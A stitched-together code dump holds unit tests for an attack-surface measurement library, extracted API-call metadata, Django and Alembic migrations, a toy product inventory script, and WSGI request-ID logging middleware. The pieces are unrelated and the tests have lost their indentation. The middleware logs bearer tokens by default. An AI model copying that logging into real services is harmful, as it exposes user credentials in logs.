for (i, j, attrs) in _target.edges
if i != expected['before'] and j != expected['before']
],
[
(i, j, attrs)
for (i, j, attrs) in target.edges
if i != expected['after'] and j != expected['after']
],
)
def test_get_fragments(self):
# Arrange
# a -- b e -- f -- g
# | |
# | |
# d -- c h -- i j
graph = nx.DiGraph()
graph.add_nodes_from(
['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']
)
graph.add_edges_from([
('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'),
('d', 'c'), ('d', 'a'), ('a', 'd'), ('e', 'f'), ('f', 'e'),
('f', 'g'), ('g', 'f'), ('h', 'i'), ('i', 'h')
])
expected = [None] * 4
expected[0] = nx.DiGraph()
expected[0].add_nodes_from(['a', 'b', 'c', 'd'])
expected[0].add_edges_from([
('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'),
('d', 'c'), ('d', 'a'), ('a', 'd')
])
expected[1] = nx.DiGraph()
expected[1].add_nodes_from(['e', 'f', 'g'])
expected[1].add_edges_from(
[('e', 'f'), ('f', 'e'), ('f', 'g'), ('g', 'f')]
)
expected[2] = nx.DiGraph()
expected[2].add_nodes_from(['h', 'i'])
expected[2].add_edges_from([('i', 'h'), ('h', 'i')])
expected[3] = nx.DiGraph()
expected[3].add_nodes_from(['j'])
# Act
actual = utilities.get_fragments(graph)
actual.sort(key=lambda i: len(i.nodes()), reverse=True)
# Assert
self.assertEqual(len(expected), len(actual))
for i in range(4):
self.assertCountEqual(expected[i].nodes(), actual[i].nodes())
self.assertCountEqual(expected[i].edges(), actual[i].edges())
def test_get_fragments_for_undirected(self):
# Arrange
# a -- b e -- f -- g
# | |
# | |
# d -- c h -- i j
graph = nx.Graph()
graph.add_nodes_from(
['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']
)
graph.add_edges_from([
('a', 'b'), ('b', 'c'), ('c', 'd'), ('d', 'a'), ('e', 'f'),
('f', 'g'), ('h', 'i')
])
# Assert
self.assertRaises(Exception, utilities.get_fragments, graph)
def test_get_largest_fragment(self):
# Arrange
# a -- b e -- f -- g
# | |
# | |
# d -- c h -- i j
graph = nx.DiGraph()
graph.add_nodes_from(
['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']
)
graph.add_edges_from([
('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'),
('d', 'c'), ('d', 'a'), ('a', 'd'), ('e', 'f'), ('f', 'e'),
('f', 'g'), ('g', 'f'), ('h', 'i'), ('i', 'h')
])
expected = nx.DiGraph()
expected.add_nodes_from(['a', 'b', 'c', 'd'])
expected.add_edges_from([
('a', 'b'), ('b', 'a'), ('b', 'c'), ('c', 'b'), ('c', 'd'),
('d', 'c'), ('d', 'a'), ('a', 'd')
])
# Act
actual = utilities.get_largest_fragment(utilities.get_fragments(graph))
# Assert
self.assertCountEqual(expected.nodes(), actual.nodes())
self.assertCountEqual(expected.edges(), actual.edges())
def test_get_node_attrs(self):
# Scenario: main -- printf (cflow)
# Arrange
source = 'cflow'
caller = Call('main', 'main.c', Environments.C)
callee = Call('printf', '', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNone(callee_attrs)
# Scenario: main -- printf (gprof)
# Arrange
source = 'gprof'
caller = Call('main', 'main.c', Environments.C)
callee = Call('printf', '', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNone(callee_attrs)
# Scenario: main -- None (gprof)
# Arrange
source = 'gprof'
caller = Call('main', 'main.c', Environments.C)
callee = None
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNone(callee_attrs)
# Scenario: main -- validate* (cflow)
# * Designed defense
# Arrange
source = 'cflow'
defenses = [Call('validate', 'utils.c', Environments.C)]
caller = Call('main', 'main.c', Environments.C)
callee = Call('validate', 'utils.c', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, defenses, list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNotNone(callee_attrs)
self.assertTrue('tested' not in callee_attrs)
self.assertTrue('defense' in callee_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertEqual(callee_attrs['frequency'], 1)
# Scenario: main -- validate* (cflow)
# * Vulnerable
# Arrange
source = 'cflow'
vulnerabilities = [Call('validate', 'utils.c', Environments.C)]
caller = Call('main', 'main.c', Environments.C)
callee = Call('validate', 'utils.c', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), vulnerabilities
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in callee_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNotNone(callee_attrs)
self.assertTrue('tested' not in callee_attrs)
self.assertTrue('defense' not in callee_attrs)
self.assertTrue('vulnerable' in callee_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertEqual(callee_attrs['frequency'], 1)
# Scenario: main* -- validate+ (cflow)
# * Vulnerable
# + Designed defense and vulnerable
# Arrange
source = 'cflow'
defenses = [Call('validate', 'utils.c', Environments.C)]
vulnerabilities = [
Call('main', 'main.c', Environments.C),
Call('validate', 'utils.c', Environments.C)
]
caller = Call('main', 'main.c', Environments.C)
callee = Call('validate', 'utils.c', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, defenses, vulnerabilities
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNotNone(callee_attrs)
self.assertTrue('tested' not in callee_attrs)
self.assertTrue('defense' in callee_attrs)
self.assertTrue('vulnerable' in callee_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertEqual(callee_attrs['frequency'], 1)
# Scenario: main* -- validate+ (cflow)
# * Designed defense
# + Designed defense and vulnerable
# Arrange
source = 'cflow'
defenses = [
Call('main', 'main.c', Environments.C),
Call('validate', 'utils.c', Environments.C)
]
vulnerabilities = [
Call('main', 'main.c', Environments.C),
Call('validate', 'utils.c', Environments.C)
]
caller = Call('main', 'main.c', Environments.C)
callee = Call('validate', 'utils.c', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, defenses, vulnerabilities
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' in caller_attrs)
self.assertTrue('vulnerable' in caller_attrs)
self.assertTrue('dangerous' not in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNotNone(callee_attrs)
self.assertTrue('tested' not in callee_attrs)
self.assertTrue('defense' in callee_attrs)
self.assertTrue('vulnerable' in callee_attrs)
        self.assertTrue('dangerous' not in callee_attrs)
        self.assertTrue('entry' not in callee_attrs)
        self.assertTrue('exit' not in callee_attrs)
self.assertEqual(callee_attrs['frequency'], 1)
# Scenario: main -- chown (cflow)
# Arrange
source = 'cflow'
caller = Call('main', 'main.c', Environments.C)
callee = Call('chown', '', Environments.C)
# Act
(caller_attrs, callee_attrs) = utilities.get_node_attrs(
source, caller, callee, list(), list()
)
# Assert
# Caller Attributes
self.assertTrue('tested' not in caller_attrs)
self.assertTrue('defense' not in caller_attrs)
self.assertTrue('vulnerable' not in caller_attrs)
self.assertTrue('dangerous' in caller_attrs)
self.assertTrue('entry' not in caller_attrs)
self.assertTrue('exit' not in caller_attrs)
self.assertTrue('frequency' not in caller_attrs)
# Callee Attributes
self.assertIsNone(callee_attrs)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"copy.deepcopy",
"attacksurfacemeter.utilities.get_node_attrs",
"attacksurfacemeter.utilities.fix",
"os.path.realpath",
"attacksurfacemeter.call.Call",
"networkx.Graph",
"attacksurfacemeter.utilities.get_fragments",
"networkx.DiGraph"
] |
[((15798, 15813), 'unittest.main', 'unittest.main', ([], {}), '()\n', (15811, 15813), False, 'import unittest\n'), ((770, 791), 'copy.deepcopy', 'copy.deepcopy', (['target'], {}), '(target)\n', (783, 791), False, 'import copy\n'), ((1248, 1286), 'attacksurfacemeter.utilities.fix', 'utilities.fix', (['target'], {'using': 'reference'}), '(target, using=reference)\n', (1261, 1286), False, 'from attacksurfacemeter import utilities\n'), ((3639, 3651), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (3649, 3651), True, 'import networkx as nx\n'), ((4050, 4062), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (4060, 4062), True, 'import networkx as nx\n'), ((4308, 4320), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (4318, 4320), True, 'import networkx as nx\n'), ((4503, 4515), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (4513, 4515), True, 'import networkx as nx\n'), ((4647, 4659), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (4657, 4659), True, 'import networkx as nx\n'), ((4734, 4764), 'attacksurfacemeter.utilities.get_fragments', 'utilities.get_fragments', (['graph'], {}), '(graph)\n', (4757, 4764), False, 'from attacksurfacemeter import utilities\n'), ((5262, 5272), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (5270, 5272), True, 'import networkx as nx\n'), ((5789, 5801), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (5799, 5801), True, 'import networkx as nx\n'), ((6167, 6179), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (6177, 6179), True, 'import networkx as nx\n'), ((6777, 6815), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (6781, 6815), False, 'from attacksurfacemeter.call import Call\n'), ((6833, 6867), 'attacksurfacemeter.call.Call', 'Call', (['"""printf"""', '""""""', 'Environments.C'], {}), "('printf', '', Environments.C)\n", (6837, 6867), False, 'from attacksurfacemeter.call import Call\n'), ((7612, 7650), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (7616, 7650), False, 'from attacksurfacemeter.call import Call\n'), ((7668, 7702), 'attacksurfacemeter.call.Call', 'Call', (['"""printf"""', '""""""', 'Environments.C'], {}), "('printf', '', Environments.C)\n", (7672, 7702), False, 'from attacksurfacemeter.call import Call\n'), ((8441, 8479), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (8445, 8479), False, 'from attacksurfacemeter.call import Call\n'), ((9349, 9387), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (9353, 9387), False, 'from attacksurfacemeter.call import Call\n'), ((9405, 9448), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (9409, 9448), False, 'from attacksurfacemeter.call import Call\n'), ((10682, 10720), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (10686, 10720), False, 'from attacksurfacemeter.call import Call\n'), ((10738, 10781), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (10742, 10781), False, 'from attacksurfacemeter.call import Call\n'), ((12208, 12246), 
'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (12212, 12246), False, 'from attacksurfacemeter.call import Call\n'), ((12264, 12307), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (12268, 12307), False, 'from attacksurfacemeter.call import Call\n'), ((12362, 12437), 'attacksurfacemeter.utilities.get_node_attrs', 'utilities.get_node_attrs', (['source', 'caller', 'callee', 'defenses', 'vulnerabilities'], {}), '(source, caller, callee, defenses, vulnerabilities)\n', (12386, 12437), False, 'from attacksurfacemeter import utilities\n'), ((13808, 13846), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (13812, 13846), False, 'from attacksurfacemeter.call import Call\n'), ((13864, 13907), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (13868, 13907), False, 'from attacksurfacemeter.call import Call\n'), ((13962, 14037), 'attacksurfacemeter.utilities.get_node_attrs', 'utilities.get_node_attrs', (['source', 'caller', 'callee', 'defenses', 'vulnerabilities'], {}), '(source, caller, callee, defenses, vulnerabilities)\n', (13986, 14037), False, 'from attacksurfacemeter import utilities\n'), ((15037, 15075), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (15041, 15075), False, 'from attacksurfacemeter.call import Call\n'), ((15093, 15126), 'attacksurfacemeter.call.Call', 'Call', (['"""chown"""', '""""""', 'Environments.C'], {}), "('chown', '', Environments.C)\n", (15097, 15126), False, 'from attacksurfacemeter.call import Call\n'), ((1093, 1133), 'attacksurfacemeter.call.Call', 'Call', (['"""GreeterSayHi"""', '""""""', 'Environments.C'], {}), "('GreeterSayHi', '', Environments.C)\n", (1097, 1133), False, 'from attacksurfacemeter.call import Call\n'), ((1156, 1214), 'attacksurfacemeter.call.Call', 'Call', (['"""GreeterSayHi"""', '"""./src/helloworld.c"""', 'Environments.C'], {}), "('GreeterSayHi', './src/helloworld.c', Environments.C)\n", (1160, 1214), False, 'from attacksurfacemeter.call import Call\n'), ((6459, 6489), 'attacksurfacemeter.utilities.get_fragments', 'utilities.get_fragments', (['graph'], {}), '(graph)\n', (6482, 6489), False, 'from attacksurfacemeter import utilities\n'), ((9287, 9330), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (9291, 9330), False, 'from attacksurfacemeter.call import Call\n'), ((10620, 10663), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (10624, 10663), False, 'from attacksurfacemeter.call import Call\n'), ((12000, 12043), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (12004, 12043), False, 'from attacksurfacemeter.call import Call\n'), ((12085, 12123), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (12089, 12123), False, 'from attacksurfacemeter.call import Call\n'), ((12137, 12180), 'attacksurfacemeter.call.Call', 'Call', 
(['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (12141, 12180), False, 'from attacksurfacemeter.call import Call\n'), ((13539, 13577), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (13543, 13577), False, 'from attacksurfacemeter.call import Call\n'), ((13591, 13634), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (13595, 13634), False, 'from attacksurfacemeter.call import Call\n'), ((13685, 13723), 'attacksurfacemeter.call.Call', 'Call', (['"""main"""', '"""main.c"""', 'Environments.C'], {}), "('main', 'main.c', Environments.C)\n", (13689, 13723), False, 'from attacksurfacemeter.call import Call\n'), ((13737, 13780), 'attacksurfacemeter.call.Call', 'Call', (['"""validate"""', '"""utils.c"""', 'Environments.C'], {}), "('validate', 'utils.c', Environments.C)\n", (13741, 13780), False, 'from attacksurfacemeter.call import Call\n'), ((600, 626), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (616, 626), False, 'import os\n'), ((926, 952), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (942, 952), False, 'import os\n')]
|
# Generated by Django 2.2.17 on 2021-03-05 09:56
from django.db import migrations
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('goods', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='goodstest',
options={'verbose_name': '商品', 'verbose_name_plural': '商品'},
),
migrations.AlterField(
model_name='goodstest',
name='detail',
field=tinymce.models.HTMLField(verbose_name='商品详情'),
),
]
|
[
"django.db.migrations.AlterModelOptions"
] |
[((237, 348), 'django.db.migrations.AlterModelOptions', 'migrations.AlterModelOptions', ([], {'name': '"""goodstest"""', 'options': "{'verbose_name': '商品', 'verbose_name_plural': '商品'}"}), "(name='goodstest', options={'verbose_name':\n '商品', 'verbose_name_plural': '商品'})\n", (265, 348), False, 'from django.db import migrations\n')]
|
# Importing needed library and Product class
import random
from acme import Product
# creating lists of adjectives and nouns
adjectives = ['Cool', 'Flavorful', 'Shiny', 'Awesome']
nouns = ['Phone', 'PS4', 'Computer', 'Anvil']
def generate_products(num_products=30):
'''
creates a list of products given the num_products input and the
adjectives and nouns lists
'''
products = []
for i in range(0, num_products):
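        # compose each product from a random adjective/noun pair with random attributes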
name = adjectives[random.randint(0, len(adjectives)-1)]\
+ ' ' + nouns[random.randint(0, len(nouns)-1)]
price = random.randint(5, 100)
weight = random.randint(5, 100)
flammability = random.uniform(0.0, 2.5)
products.append(Product(name=name, price=price,
weight=weight, flammability=flammability))
return products
generate_products()
def inventory_report(products):
'''
    takes a list of products as input and outputs a nice summary
'''
price_list = []
weight_list = []
flame_list = []
for obj in products:
price_list.append(obj.price)
weight_list.append(obj.weight)
flame_list.append(obj.flammability)
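    # compute simple averages over the collected attributes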
average_price = sum(price_list) / len(price_list)
average_weight = sum(weight_list) / len(weight_list)
average_flame = sum(flame_list) / len(flame_list)
print('ACME CORPORATION OFFICIAL INVENTORY REPORT')
    print('Unique product names: ' + str(len({obj.name for obj in products})))
print('Average price: {}'.format(average_price))
print('Average weight: {}'.format(average_weight))
print('Average flammability: {}'.format(average_flame))
if __name__ == '__main__':
inventory_report(generate_products())
|
[
"random.randint",
"acme.Product",
"random.uniform"
] |
[((578, 600), 'random.randint', 'random.randint', (['(5)', '(100)'], {}), '(5, 100)\n', (592, 600), False, 'import random\n'), ((618, 640), 'random.randint', 'random.randint', (['(5)', '(100)'], {}), '(5, 100)\n', (632, 640), False, 'import random\n'), ((664, 688), 'random.uniform', 'random.uniform', (['(0.0)', '(2.5)'], {}), '(0.0, 2.5)\n', (678, 688), False, 'import random\n'), ((713, 786), 'acme.Product', 'Product', ([], {'name': 'name', 'price': 'price', 'weight': 'weight', 'flammability': 'flammability'}), '(name=name, price=price, weight=weight, flammability=flammability)\n', (720, 786), False, 'from acme import Product\n')]
|
"""empty message
Revision ID: 8fb490efb894
Revises: <KEY>
Create Date: 2020-06-15 20:33:31.609050
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '8fb490efb894'
down_revision = '<KEY>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('boss_base',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=32), nullable=True),
sa.Column('nameSafe', sa.String(length=32), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_boss_base_name'), 'boss_base', ['name'], unique=True)
op.create_index(op.f('ix_boss_base_nameSafe'), 'boss_base', ['nameSafe'], unique=True)
op.create_table('bossteam',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('hero', sa.String(length=16), nullable=True),
sa.Column('damage', sa.Integer(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('bossbase_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['bossbase_id'], ['boss_base.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_bossteam_damage'), 'bossteam', ['damage'], unique=False)
op.create_index(op.f('ix_bossteam_hero'), 'bossteam', ['hero'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_bossteam_hero'), table_name='bossteam')
op.drop_index(op.f('ix_bossteam_damage'), table_name='bossteam')
op.drop_table('bossteam')
op.drop_index(op.f('ix_boss_base_nameSafe'), table_name='boss_base')
op.drop_index(op.f('ix_boss_base_name'), table_name='boss_base')
op.drop_table('boss_base')
# ### end Alembic commands ###
|
[
"alembic.op.drop_table",
"alembic.op.f",
"sqlalchemy.PrimaryKeyConstraint",
"sqlalchemy.ForeignKeyConstraint",
"sqlalchemy.String",
"sqlalchemy.Integer"
] |
[((1690, 1715), 'alembic.op.drop_table', 'op.drop_table', (['"""bossteam"""'], {}), "('bossteam')\n", (1703, 1715), False, 'from alembic import op\n'), ((1862, 1888), 'alembic.op.drop_table', 'op.drop_table', (['"""boss_base"""'], {}), "('boss_base')\n", (1875, 1888), False, 'from alembic import op\n'), ((578, 607), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (601, 607), True, 'import sqlalchemy as sa\n'), ((634, 659), 'alembic.op.f', 'op.f', (['"""ix_boss_base_name"""'], {}), "('ix_boss_base_name')\n", (638, 659), False, 'from alembic import op\n'), ((717, 746), 'alembic.op.f', 'op.f', (['"""ix_boss_base_nameSafe"""'], {}), "('ix_boss_base_nameSafe')\n", (721, 746), False, 'from alembic import op\n'), ((1103, 1161), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['bossbase_id']", "['boss_base.id']"], {}), "(['bossbase_id'], ['boss_base.id'])\n", (1126, 1161), True, 'import sqlalchemy as sa\n'), ((1169, 1218), 'sqlalchemy.ForeignKeyConstraint', 'sa.ForeignKeyConstraint', (["['user_id']", "['user.id']"], {}), "(['user_id'], ['user.id'])\n", (1192, 1218), True, 'import sqlalchemy as sa\n'), ((1226, 1255), 'sqlalchemy.PrimaryKeyConstraint', 'sa.PrimaryKeyConstraint', (['"""id"""'], {}), "('id')\n", (1249, 1255), True, 'import sqlalchemy as sa\n'), ((1282, 1308), 'alembic.op.f', 'op.f', (['"""ix_bossteam_damage"""'], {}), "('ix_bossteam_damage')\n", (1286, 1308), False, 'from alembic import op\n'), ((1368, 1392), 'alembic.op.f', 'op.f', (['"""ix_bossteam_hero"""'], {}), "('ix_bossteam_hero')\n", (1372, 1392), False, 'from alembic import op\n'), ((1568, 1592), 'alembic.op.f', 'op.f', (['"""ix_bossteam_hero"""'], {}), "('ix_bossteam_hero')\n", (1572, 1592), False, 'from alembic import op\n'), ((1635, 1661), 'alembic.op.f', 'op.f', (['"""ix_bossteam_damage"""'], {}), "('ix_bossteam_damage')\n", (1639, 1661), False, 'from alembic import op\n'), ((1734, 1763), 'alembic.op.f', 'op.f', (['"""ix_boss_base_nameSafe"""'], {}), "('ix_boss_base_nameSafe')\n", (1738, 1763), False, 'from alembic import op\n'), ((1807, 1832), 'alembic.op.f', 'op.f', (['"""ix_boss_base_name"""'], {}), "('ix_boss_base_name')\n", (1811, 1832), False, 'from alembic import op\n'), ((419, 431), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (429, 431), True, 'import sqlalchemy as sa\n'), ((472, 492), 'sqlalchemy.String', 'sa.String', ([], {'length': '(32)'}), '(length=32)\n', (481, 492), True, 'import sqlalchemy as sa\n'), ((536, 556), 'sqlalchemy.String', 'sa.String', ([], {'length': '(32)'}), '(length=32)\n', (545, 556), True, 'import sqlalchemy as sa\n'), ((840, 852), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (850, 852), True, 'import sqlalchemy as sa\n'), ((893, 913), 'sqlalchemy.String', 'sa.String', ([], {'length': '(16)'}), '(length=16)\n', (902, 913), True, 'import sqlalchemy as sa\n'), ((955, 967), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (965, 967), True, 'import sqlalchemy as sa\n'), ((1010, 1022), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1020, 1022), True, 'import sqlalchemy as sa\n'), ((1069, 1081), 'sqlalchemy.Integer', 'sa.Integer', ([], {}), '()\n', (1079, 1081), True, 'import sqlalchemy as sa\n')]
|
"""
Middleware and logging filter to add request IDs to logs and forward request IDs in downstream requests
"""
import logging
import re
import traceback
import datetime
import pythonjsonlogger
import pythonjsonlogger.jsonlogger
import wsgi_microservice_middleware
logger = logging.getLogger(__name__)
REQUEST_ID_HEADER_NAME = wsgi_microservice_middleware.env.str("REQUEST_ID_HEADER", "X-Request-Id")
LOG_TOKENS = wsgi_microservice_middleware.env.bool("LOG_TOKENS", True)
def make_wsgi_header_key(header: str):
wsgi_header = "HTTP_" + REQUEST_ID_HEADER_NAME.replace("-","_").upper()
return wsgi_header
class RequestIdMiddleware(object):
"""
    This middleware adds an access log-style record with a request id and
    includes the request id in the response headers
"""
def __init__(self, app, header_name: str = None):
self.header_name = header_name
if not self.header_name:
self.header_name = REQUEST_ID_HEADER_NAME
self.wsgi_header_key = make_wsgi_header_key(self.header_name)
self.app = app
def __call__(self, environ, start_response):
def custom_start_response(status, headers, exc_info=None):
# append whatever headers you need here
FACTS = [
environ.get("HTTP_HOST", ""),
environ.get("REQUEST_METHOD", ""),
environ.get("RAW_URI", ""),
environ.get("SERVER_PROTOCOL", ""),
status
]
message = " | ".join(FACTS)
request_id = environ.get(self.wsgi_header_key, '""')
extra = {"request_id": request_id}
token = None
if LOG_TOKENS:
try:
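                    # extract the bearer token from the Authorization header so it can be logged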
auth_header = environ.get("HTTP_AUTHORIZATION", None)
                    token = re.sub(r"\W", "", re.sub(r"^Bearer\s*", "", auth_header))
if token:
extra.update({"token": token})
except Exception:
                    # No exception log; request is missing a token
pass
            adapter = logging.LoggerAdapter(logger, extra=extra)
            adapter.info(message)
headers.append((self.header_name, request_id,))
return start_response(status, headers, exc_info)
return self.app(environ, custom_start_response)
def current_request_id():
"""
    Retrieves the current request id from the wsgi `environ` buried in the call stack
"""
_req = None
wsgi_header = "HTTP_" + REQUEST_ID_HEADER_NAME.replace("-","_").upper()
try:
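        # walk up the call stack to find this module's frame that holds the WSGI environ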
for frame in traceback.walk_stack(None):
if getattr(frame[0], 'f_globals', None) and getattr(frame[0], 'f_locals', None):
if frame[0].f_globals.get('__name__', None) == __name__ and 'environ' in frame[0].f_locals:
environ = frame[0].f_locals['environ']
_req = environ.get(wsgi_header, None)
break
except Exception:
pass
return _req
class RequestIdFilter(logging.Filter):
"""
    Logger filter to add a `{request_id}` logger variable to the logging context
"""
def __init__(self, header_name=REQUEST_ID_HEADER_NAME, *args, **kwargs):
self.header_name = header_name
self.wsgi_header_key = "HTTP_" + self.header_name.replace("-","_").upper()
super().__init__(*args, **kwargs)
def filter(self, record):
record.request_id = self.get_current_request_id()
return True
def get_current_request_id(self):
_req = current_request_id()
if _req:
request_id = _req
else:
request_id = ""
return request_id
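# Example wiring (a sketch, not part of the original source): attach the filter
# to a handler so log format strings can reference %(request_id)s, e.g.:
#   handler.addFilter(RequestIdFilter())
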